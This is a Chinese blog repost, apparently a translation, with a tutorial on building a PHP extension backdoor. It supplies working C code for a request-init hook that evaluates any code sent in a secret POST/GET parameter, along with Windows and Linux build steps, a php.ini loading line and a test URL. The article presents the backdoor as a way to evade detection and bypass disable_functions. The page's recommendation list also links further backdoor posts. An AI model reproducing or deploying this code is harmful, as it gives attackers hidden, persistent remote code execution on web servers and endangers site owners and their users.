php扩展库后门,编写基于PHP扩展库的后门

于 2021-03-20 23:55:29 发布
阅读量202 收藏
点赞数
文章标签: php扩展库后门

0x00 前言

今天我们将讨论编写基于PHP扩展库的后门。通常来说,大部分入侵者都会在脚本中留下自定义代码块后门。当然,这些东西很容易通过源代码的静态或动态分析找到。

利用PHP扩展库的好处显而易见:

很难寻找

绕过disable_functions选项

有能力控制所有的代码

访问代码执行的API

但是我们需要有编辑PHP配置文件的能力。

0x01 细节

//【译者注:用linux两条命令搞定了,何必windows费这么大劲】 作为例子,我会用Windows来写。写扩展我用的Visual Studio 2012 Express版本。还需要的源代码最新版本,编译PHP库(可从同一来源收集)。为简单起见,我们需要是的php-5.5.15-Win32的VC11-86和源PHP-5.5.15-src.zip

解压使用C编译PHP:PHP,源代码在C:PHP-SRC。

然后,你需要进行一些设置。

1)添加预处理器定义:

ZEND_DEBUG=0

ZTS=1

ZEND_WIN32

PHP_WIN32

12ad5365f7fa5bd4d58bb72d6a72cd48.png

预处理器定义 2)添加的目录,用于连接源:

C: PHP-SRCmain

C: PHP-SRCend

C: PHP-SRCTSRM

C: PHP-SRC

egex

C: PHP-SRC

3a4579c74f4f1fec4aafde4371afb25d.png

其他目录连接

3)添加其他目录中liboy php5ts.lib(C: PHP dev的)

61b2b6b5ae188f17d93798454ded75e0.png

其他目录库 4)添加连接库php5ts.lib。

24db68b11322dfa6881d291338e27f13.png

装配额外的库

5)指定收集文件的路径。

3b0ade141dbb93d2a2115be23e0ba4a7.png

保存配置文件 配置参数为Workspace扩展的开发后(详情可以在http://blog.slickedit.com/2007/09/creating-a-php-5-extension-with-visual-c-2005/找到),创建一个新的项目类型后门“控制台应用程序的Win32”。

82ea882fb49a35b069fdb1a3cb0bda69.png

在Visual StudioVyberem型“库DLL»项目” 选择合适类型

788aab27aad52282d701254267925c1f.png

然后,从项目中删除不必要的文件。应该只需要backdoor.cpp,STDAFX.CPP和stdafx.h中。

在头文件stdafx.h中 :

#pragma once

#ifndef STDAFX

#define STDAFX

#include "zend_config.w32.h"

#include "php.h"

#endif

现在,我们直接进入PHP扩展的代码。删除所有行,并添加所需的文件连接。

#include "stdafx.h"

#include "zend_config.w32.h"

#include "php.h"

如果workspace设置已经正确,警告就会消失。 当模块被初始化时,会有几个事件,其中每一个都在特定条件下发生。我们需要在查询执行时,去执行我们的代码。要做到这一点,你必须初始化我们所需要的功能,我给它命名为«hideme»。 PHP_RINIT_FUNCTION(hideme); 然后你可以去看模块的初始化。

zend_module_entry hideme_ext_module_entry = {

STANDARD_MODULE_HEADER,

"simple backdoor",

NULL,

NULL,

NULL,

PHP_RINIT(hideme),

NULL,

NULL,

"1.0",

STANDARD_MODULE_PROPERTIES

};

ZEND_GET_MODULE(hideme_ext);

在这篇文章中,我们只需要加载中代码被执行即可,因此运行和卸载模块由空取代。 现在,你可以去看hideme的函数体。

PHP_RINIT_FUNCTION(hideme)

{

char* method = "_POST"; //超全局数组,从中我们采取perametr和价值 char* secret_string = "secret_string"; //参数,这将是运行的代码

//【译者注:在原文作者的github代码中method是get,secret_string是execute,请大家按照github代码进行测试,不修改原文了】

zval** arr;

char* code;

if (zend_hash_find(&EG(symbol_table), method, strlen(method) + 1, (void**)&arr) != FAILURE) {

HashTable* ht = Z_ARRVAL_P(*arr);

zval** val;

if (zend_hash_find(ht, secret_string, strlen(secret_string) + 1, (void**)&val) != FAILURE) { //查找散列表中所需的参数

code = Z_STRVAL_PP(val); //值

zend_eval_string(code, NULL, (char *)"" TSRMLS_CC); //代码执行

}

}

return SUCCESS;

}

注释应该比较清楚。最初,我们设置HTTP方法和参数secret_string。然后再寻找正确的数组参数,如果有的话,我们就从它的值中取指令,并通过zend_eval_string执行代码。 编译后的所得,即可作为一个扩展库。

下载源代码

https://github.com/akamajoris/php-extension-backdoor

0x02 测试

//以下为译者测试截图:

5ed60c150798a8cf15f661db7f48b863.png

http://127.0.0.1:1629/20140917/test.php?execute=phpinfo();

(因为原作者github代码设置的是execute)

Linux编译(kali)

apt-get install php5-dev

phpize && ./configure && make

在kali下测试一遍成功,我比较懒,直接chmod后把so复制到/var/www了哈哈

然后php.ini加上

extension=/var/www/back.so

重启apache,测试成功

暴躁毒舌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php_backdoor.php
06-11
大马文件
php 后门程序解析
weixin_34367257的博客
09-28 184
2019独角兽企业重金招聘Python工程师标准>>> ...
php云仅用于,PHP-backdoors 一个PHP后门的集合,仅用于学习或测试目的
weixin_31861055的博客
03-13 85
PHP-backdoorsA collection of PHP backdoors. For educational and/or testing purposes only.NotesThe deobfuscated folder does not necessarily contain deobfuscated versions of the backdoors you can find i...
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 534
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
PhpStudy BackDoor 2019漏洞
qq_45521281的博客
05-05 4191
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 基础介绍 事件背景 北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控...
php后门URL的防范
10-26
后门URL是指虽然无需直接调用的资源能直接通过URL访问
一些 PHP 管理系统程序中的后门
10-29
一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全。
360webscan后门查杀php专版
04-18
自用的,360webscan后门查杀php专版,3个文件均能扫描,上传到网站根目录下运行
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
一个不易被发现的PHP后门代码解析
10-25
主要介绍了一个不易被发现的PHP后门代码解析,对于网络安全来说非常重要,需要的朋友可以参考下
一次失败的PHP扩展开发之旅
我的奋斗
11-19 6872
一次失败的PHP扩展开发之旅
php内核分析(八)-zend_compile
weixin_33853827的博客
12-05 228
这里阅读的php版本为PHP-7.1.0 RC3,阅读代码的平台为linux 回到之前看的zend_eval_stringl ZEND_API int zend_eval_stringl(char *str, size_t str_len, zval *retval_ptr, char *string_name) /* {{{ */ { ... new_op_array = zen...
lr_eval_string()函数的使用学习
热门推荐
zgnsjl的专栏
08-31 1万+
lr_eval_string() 函数的主要作用:返回脚本中的一个参数当前的值, 返回值类型:char 一般多用在调试脚本时输出参数的值.具体用法如下: lr_output_message("The parameter1's value is %s",lr_eval_string("{parameter1}")),其中参数parameter1在之前已经定义了的参数 lr_
字符串(zend_string)
gripex的博客
09-05 401
_zend_string typedef struct _zend_string zend_string; struct _zend_string { zend_refecounted_h gc; // 用于垃圾回收 zend_ulong h; // 空间换时间,用于做hash运算,之后用在数组中 /* len + val[1], 增加存储长度, 组成二进制安全的数组 */ size_t len; // 长度 char val[1]; // 字符数
PHP代码审计之命令执行
luyaran的博客
01-13 1134
PHP命令注入攻击漏洞是PHP应用程序常见漏洞之一。国内著名的PHP应用程序,如discuz!、dedecms等大型程序在网络中均被公布过存在命令注入攻击漏洞,黑客可以通过命令注入攻击漏洞快速获取网站权限,进而实施挂马、钓鱼等恶意攻击,造成的影响和危害十分巨大。同时,目前PHP语言应用于Web应用程序开发所占比例较大,Web应用程序员应该了解命令注入攻击漏洞的危害. PHP 执行系统命令可以
PHP SAPI(CLI)个人整理
liwenbo_csu的博客
05-26 2171
通常,我们使用Apache或者Nginx这类Web服务器来测试PHP脚本,或者在命令行下通过PHP解释器程序来执行。脚本执行完后,Web服务器应答,浏览器显示应答信息,或者在命令行标准输出上显示内容。 我们很少关心PHP解释器在哪里。虽然通过Web服务器和命令行程序执行脚本看起来很不一样,实际上它们的工作流程是一样的。命令行参数传递给PHP解释器要执行的脚本,相当于通过url
php源码扫描后门工具
最新发布
01-23
PHP源码扫描后门工具是一种可以帮助开发者检测PHP源代码中是否存在后门的工具。这种工具通常会使用静态代码分析技术,对PHP源码进行深入扫描和分析,以便找出可能存在的后门代码或者安全漏洞。 这种工具的工作原理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值